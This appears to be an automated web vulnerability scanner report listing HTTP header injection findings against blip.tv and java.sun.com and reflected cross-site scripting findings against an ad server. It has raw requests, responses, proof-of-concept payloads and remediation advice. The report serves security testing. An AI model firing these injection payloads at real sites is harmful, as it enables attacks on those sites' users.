<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/posts/7e782 dfaef70a8a1">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 9d984%0d%0adeedf2ae191 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9d984%0d%0adeedf2ae191/security/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/9d984 deedf2ae191/security/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 303 Date: Thu, 20 Jan 2011 00:39:07 GMT X-Varnish: 1324533869 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/9d984 deedf2ae191/security/ ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 548cc%0d%0a6fdc2af0610 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /prefs/548cc%0d%0a6fdc2af0610/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/prefs/548cc 6fdc2af0610/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 285 Date: Thu, 20 Jan 2011 00:39:08 GMT X-Varnish: 1025273584 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/prefs/548cc 6fdc2af0610/">h ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 778ef%0d%0a0ce99cdfdfd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /778ef%0d%0a0ce99cdfdfd HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/778ef 0ce99cdfdfd Content-Type: text/html; charset=iso-8859-1 Content-Length: 293 Date: Thu, 20 Jan 2011 00:38:56 GMT X-Varnish: 2146050195 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/778ef 0ce99cdfdfd">here</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 888f6%0d%0aa3fc8004d0a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /888f6%0d%0aa3fc8004d0a HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/888f6 a3fc8004d0a Content-Type: text/html; charset=iso-8859-1 Content-Length: 278 Date: Thu, 20 Jan 2011 00:38:55 GMT X-Varnish: 1324531933 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/888f6 a3fc8004d0a">here</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 92db0%0d%0aa554397957c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /92db0%0d%0aa554397957c/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/92db0 a554397957c/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 279 Date: Thu, 20 Jan 2011 00:39:11 GMT X-Varnish: 1324534466 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/92db0 a554397957c/">here</a ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload ff801%0d%0a89d985fd93 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ff801%0d%0a89d985fd93 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/ff801 89d985fd93 Content-Type: text/html; charset=iso-8859-1 Content-Length: 277 Date: Thu, 20 Jan 2011 00:39:40 GMT X-Varnish: 1324538033 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/ff801 89d985fd93">here</a>. ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 59a80%0d%0a49d824c3177 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /59a80%0d%0a49d824c3177/flash/4658178 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/59a80 49d824c3177/flash/4658178 Content-Type: text/html; charset=iso-8859-1 Content-Length: 292 Date: Thu, 20 Jan 2011 00:39:17 GMT X-Varnish: 1498224698 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/59a80 49d824c3177/flash/465 ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 67fe1%0d%0a43cf9793345 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /67fe1%0d%0a43cf9793345 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/67fe1 43cf9793345 Content-Type: text/html; charset=iso-8859-1 Content-Length: 293 Date: Thu, 20 Jan 2011 00:39:11 GMT X-Varnish: 1248912469 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/67fe1 43cf9793345">here</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 58140%0d%0a77d07a20ef2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /58140%0d%0a77d07a20ef2/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/58140 77d07a20ef2/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 279 Date: Thu, 20 Jan 2011 00:39:01 GMT X-Varnish: 1025272549 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/58140 77d07a20ef2/">here</a ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload eeffd%0d%0aee8661e2d6a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /eeffd%0d%0aee8661e2d6a/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/eeffd ee8661e2d6a/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 294 Date: Thu, 20 Jan 2011 00:39:09 GMT X-Varnish: 2146052258 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/eeffd ee8661e2d6a/">here</a ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 2bbca%0d%0a3f56472e5e4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2bbca%0d%0a3f56472e5e4/blogging_info?posts_id=4658178&no_wrap=1 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/2bbca 3f56472e5e4/blogging_info?posts_id=4658178&no_wrap=1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 323 Date: Thu, 20 Jan 2011 00:38:54 GMT X-Varnish: 1248909706 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/2bbca 3f56472e5e4/blogging_ ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 61ba9%0d%0a48398cbb55a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /users/61ba9%0d%0a48398cbb55a?posts_id=4658178&no_wrap=1 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/users/61ba9 48398cbb55a?posts_id=4658178&no_wrap=1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Date: Thu, 20 Jan 2011 00:38:55 GMT X-Varnish: 1324531887 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/users/61ba9 48398cbb55a?pos ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload b978d%0d%0a85dffaa1bb8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /b978d%0d%0a85dffaa1bb8/create/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/b978d 85dffaa1bb8/create/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 286 Date: Thu, 20 Jan 2011 00:38:51 GMT X-Varnish: 1248909074 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/b978d 85dffaa1bb8/create/"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload b0b83%0d%0a934141a9f8a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /users/b0b83%0d%0a934141a9f8a/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/users/b0b83 934141a9f8a/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 285 Date: Thu, 20 Jan 2011 00:38:51 GMT X-Varnish: 1274885483 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/users/b0b83 934141a9f8a/">h ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 8a64b%0d%0a295d52c66b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8a64b%0d%0a295d52c66b0/login/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/8a64b 295d52c66b0/login/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 300 Date: Thu, 20 Jan 2011 00:38:51 GMT X-Varnish: 1324531121 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/8a64b 295d52c66b0/login/">h ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 105d8%0d%0a88428ed14e8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /users/105d8%0d%0a88428ed14e8/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/users/105d8 88428ed14e8/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 285 Date: Thu, 20 Jan 2011 00:38:51 GMT X-Varnish: 2146049249 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/users/105d8 88428ed14e8/">h ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload e17ed%0d%0ad0c42b6818c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e17ed%0d%0ad0c42b6818c/stats/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/e17ed d0c42b6818c/stats/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 285 Date: Thu, 20 Jan 2011 00:38:53 GMT X-Varnish: 1274885804 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/e17ed d0c42b6818c/stats/">h ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 3080a%0d%0ad04494d6657 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /users/3080a%0d%0ad04494d6657/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/users/3080a d04494d6657/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 285 Date: Thu, 20 Jan 2011 00:38:53 GMT X-Varnish: 1498220902 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/users/3080a d04494d6657/">h ...[SNIP]...
The value of REST URL parameter 4 is copied into the Location response header. The payload 2811c%0d%0ac2ddb1d3f25 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab2811c%0d%0ac2ddb1d3f25 HTTP/1.1 Host: java.sun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Sun-Java-System-Web-Server/7.0 Date: Thu, 20 Jan 2011 00:42:25 GMT Location: /update/1.4.2/jinstall-1_4_2-windows-i586.cab2811c c2ddb1d3f25 Content-length: 0 Connection: close
3. Cross-site scripting (reflected)previousnext There are 41 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 621ff<script>alert(1)</script>e20b2a52729 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad621ff<script>alert(1)</script>e20b2a52729/cm.martini/ HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; mmpg=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 69 Vary: Accept-Encoding Date: Thu, 20 Jan 2011 00:35:10 GMT Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f4db'-alert(1)-'1de1bb3448d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.martini3f4db'-alert(1)-'1de1bb3448d/;sz=728x90;click0=http%3a%2f%2fad.afy11.net%2fad%3fc%3dEPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ9zsbGZN4CyKa6mnyBGPxQkyumws5Xt6rwuZek5LVXWIZUsD%2bx8G9fs11dXeU4%3d!;ord=3271752524? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 438 Date: Thu, 20 Jan 2011 00:26:52 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 19-Feb-2011 00:26:52 GMT
3.3. http://a.collective-media.net/adj/cm.martini/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/cm.martini/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ebe1'-alert(1)-'2b9cb0141a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.martini/;sz=728x90;click0=http%3a%2f%2fad.afy11.net%2fad%3fc%3dEPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ9zsbGZN4CyKa6mnyBGPxQkyumws5Xt6rwuZek5LVXWIZUsD%2bx8G9fs11dXeU4%3d!;ord=3271752524?&4ebe1'-alert(1)-'2b9cb0141a4=1 HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 442 Date: Thu, 20 Jan 2011 00:26:51 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 19-Feb-2011 00:26:51 GMT
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a595d'-alert(1)-'08a39541440 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
